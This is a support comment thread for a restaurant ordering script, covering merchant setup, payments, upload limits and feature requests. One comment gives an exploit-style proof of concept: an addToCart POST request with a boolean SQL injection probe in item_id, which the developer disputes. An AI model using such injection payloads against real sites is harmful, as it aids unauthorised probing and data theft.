29722 comments found.
Hi Basti, i sent email. Please check. Thanks
sent
Hello, I get an Error when I tried to register a merchant from the customer website. Also, Im unable to create a new merchant in the admin end it just says this page doesnt exist. Can you help?
sure
email me here all your access like site link, admin login and ftp access
and provide screenshot of the error
https://codecanyon.net/user/bastikikang#contactleave a comment here once you send it so i will be notified
cheers
Is it possible for each merchant to have their own stripe/paypal account set so payments are processed directly via them?
just set your merchant type to membership,
all membership type can receive all the payment directly
here are the different type of merchant
membership = this means all payment will receive by merchant directly and merchant will need to set the payment settings in merchant panel
commission = this means all payments will go to admin/website owner and the payment settings will be use is in admin panel
commission+invoice = same as membership and they will receive invoice that they need to pay to website owner
The system is blocking the robots.txt file for Google Adword, how can I solve the problem?
hi mate
check your file robots.txt
it should not have any code that prevent google crawling your site
When will it be possible to add different locations to the same restaurants?
hi mate
i cannot promise it yet since am working on multi currency might be available in new kmrs
You forget the most important detail of things, one of them is these details.
1) Several locations for the same restaurants * Important
2) Different tax or tax to configure the item
3) POS implementation
4) Establish commission statistics for drivers
5) Payment button for driver application
6) Merchant chat to communicate with the client and driver
7) Opening and closing hours for services
(Example delivery from 9:30 to 10pm and Pickup from 9:30 to 5pm)
8 ) To be able to add another type of manual services as an example curbside pickup
Wait to receive a “Your order is ready” in-app notification.
When you’re ready to head to the store, open the app and select Tell us you’re coming. If it doesn’t automatically populate, you can find it on the Account tab under Purchases.
On the next screen, select I’m on my way when leaving for the store.
Park in a designated parking spot labeled Drive Up. The designated parking spots are located near a store entrance.
If your location services are turned on, a team member will automatically be alerted. If your location services are off, you’ll have to open the app and select I’m at the store after you’ve parked.
A team member will bring your order out to your vehicle and scan the Drive Up barcode on your app to confirm your order.
You’ll receive notification when your order is ready for you to pick up.
9) Arrangement of billing by credit of sending text message to merchant
10) Generic configuration for new payment gateway.
11) API integration for External orders. I’m not talking about the api of your applications. Since its structure is very complex and identify the calls to the classes or functions of its programming
Among other more details that through this chat
many of these things you have promised 3 years ago since I follow this platform. But I see that you do not focus on the details, a module that could be sold separately. I also see that you do not grant permission for another developer to help you in this area and to cover these needs. This is called a code or developer area collaboration. You can implement a new sale here indicating license for developer and sale of modules.
It will help the system grow and grow in many areas that it lacks. Like the design of the web that is not modern and the implementation of an Admin Dasboard more aimed at the mobile web.
There are many details that you cannot do alone, leave us the freedom to develop additional modules to meet these needs. Why these details are affecting.
For example, if there is a restaurant with 10 different locations using SingleApp, it is difficult to create 10 applications for that restaurant. It is not logical. You already lose that sale or that market. Therefore, the easiest solution is to create a module in the singleapp that allows us to select the location of the restaurants by means of select at the beginning of the application. For example:
1) That at the beginning of the application we can select the location and the application change the variable of the API that is connecting.
2) That through the GPS location find the closest api of the location.
3) or an input that the client selects the location that wants to send the order.
Please consider granting a permission to developers “It does not matter if you have to pay a fee” to be able to cover needs in the codes
- Exploit Title: Karenderia Multiple Restaurant System
- 1. description :
- When the user/attacker will add items to the cart, the attacker can intercept the data post, and add sql injection to the item_id parameter.
- 2. POC :
POST : /admin/ajax
action=addToCart&item_id=1’ and ‘1’=’1&row=&merchant_id=1&discount=¤tController=store&category_id=171&price=14.50&qty=2¬es=&require_addon_86=2&sub_item%5B86%5D%5B%5D=376%7C2%7CFried+Rice+%26+Fries%7C
hi mate
there is no such thing like this
you cannot add your own sql injection as the code is using qoate value of yii which prevent any sql injection 
ok
Hello again. I am facing a new problem: D I received a notification from a restaurant. He says he wants to add a picture to my restaurant menu, but the file limit is exceeded.
The image size the restaurant wants to upload is 15 mb. What should I do for these images to be uploaded?
max file size on php ini is 128 mb, max post size is 256 mb.
But still does not load.
What do I need to change in my software files?
I am waiting for your immediate reply 
Answer?
hi mate
edit the file components/functionsv3.php and look for function imageLimitSize()
change the value of 10485760 this is in bytes
Basti I was able to add a code in the AjaxAdmin file to be able to make payment to a payment api server but it only works for me for web orders. When I test in the mobile2 app this setting stops working. I ask you for the mobile2 and SingleApp applications is there another code to process payments? Since I thought that the placeOrder function was the central function for the whole system.
// test code to stop execution
if ($ this-> data ['payment_opt'] == "ocr") {
$ this-> msg = Yii :: t ("default", "CC-ID". $ params ['cc_id']);
// Api to integrate Payment Gateway
..............
} else {
if ($ this-> insertData ("{{order}}", $ params)) {
$ order_id = Yii :: app () -> db-> getLastInsertID ();
.................
? Answer?
I already succeeded, I had to modify several files and study their structure further. From what I see you use a file to process the payment for each application. But I already achieved the goal
hi mate
glad you figure it out
remember the web and mobile app has different code
Basti would have told me that all the files were different to process the payment, since I was only editing the placeOrder function as you indicated. Please be a little clearer, remember that although the module is all apart, in the end everything has to do the same.
But still thank you for your help and the little tips
Help and support is appreciated
Hello again.
As you know, there is a regional delivery fee system in your system.
How can I convert this to a region by region minimum order fee?
In short, I want my customers not to pay the delivery fee, but to exceed the minimum order fee and place an order in this way. For example, while there is a minimum order limit of 25 TL for a district of Tekirdağ province, another part should be 15 TL.
I will be very happy if you return soon 
Answer?
hi mate
are you using search by location?
if yes i think this is not available at the moment
Hello my brother Basti. Can you show me what is the code to make a link or a button, that if we clicked it can go back to recent merchant menu? Like in the back mobile button in the mobile_header.php?
For what i mean, see this screenshot : https://prnt.sc/x9h0zl ... Please guide me. Thank you.
because? what is missing?
Hi Basti,
I wanna add the abn number ont my invoices so i’ve found the invoice template, then i would like to show it on the invoice.
On the DB i’ve found the abn row but how to call it into the invoice ?
<?php echo stripslashes($invoice_info[‘abn’])?> & <?php echo stripslashes($invoice_info[‘merchant_abn’])?>
Not working any ideas ?
Cheers
Hello basti, to make a suggestion and keep it in mind in future updates. When the invoices are generated, the merchant’s account should be suspended until payment is made and a charge generated using online payment methods, that there is a button that redirects the merchant to pay. I hope you’ll consider it soon
Your software packages look excellent! Can I ask the following questions please:
1) If I purchase the regular license can I later upgrade to the extended license? 2) Is there an option to take payment for a booking? 3) Is there a booking confirmation process with customer email? 4) Stripe payment gateway integration is included, can split payments be taken? If not can we add a custom module (I realise this might break future upgrades) . 5) Do you accept paid for custom extensions?
Many thanks
Hi Basti I hope you doing well, this not a support request just need and advise before renewing by Support license I have a Unique use case, I would like to use this for different Kinds of Product listings and deliveries, please see this https://codecanyon.net/item/grocery-food-pharmacy-store-delivery-mobile-app-with-admin-panel/26409320 Something similar, can Karenderias be suitable for such a case?
Hello there
A file is added every minute every 5 minutes to the Public_html folder, whose source I think is cron. This is increasing my inode count. How should we solve this?
IMAGE: https://hizliresim.com/nfaGbUAnswer?
in your cron jobs just add this a the very end >/dev/null 2>&1
https://stackoverflow.com/questions/41522552/how-can-i-prevent-creating-log-files-by-cronjobHello Basti, on Delivery Charges Rates, is there a way to define minimum order value for each different location ? i know we have this global option for all location but is there a way to do this? thank you
at the moment this is still missing in search by location 
ok thank you
Hi mate,
We have discussed about the payment gateway. Let us confirm the job;
a) Send me the payment link.
Please reply.
Thanks.
very sorry mate for late reply 
are you able to wait until i finish multi currency addon
Hi mate,
I know you are busy and thanks for your reply. May, I know your estimated time for multi currency addon to complete? I would like to activate the payment gateway as soon as possible as this is one of the key feature. Due to the lock down, this is a useful mode to reach the customer.
For me to launch, at least one local payment gate is required. I don't want to miss the opportunity. Hope you can assist me.
hello my friend
i was sort of confused.
you said that you will update backend and front first
but reading some posts, you talk about multi currency and single app website addons.
can you clarify about this?
thank you
hi mate
since many keep emailing me about the multi currency addon
i stop the new backend to focus on new multi currency addon
but i will have to also release update with kmrs so that multi currency will work
since i added so many new tables for kmrs this is new tables is ready for the new kmrs
am changing the db structure of food item
mail send 5 days bef0re
sent
sent
sent
sent
sent
sent 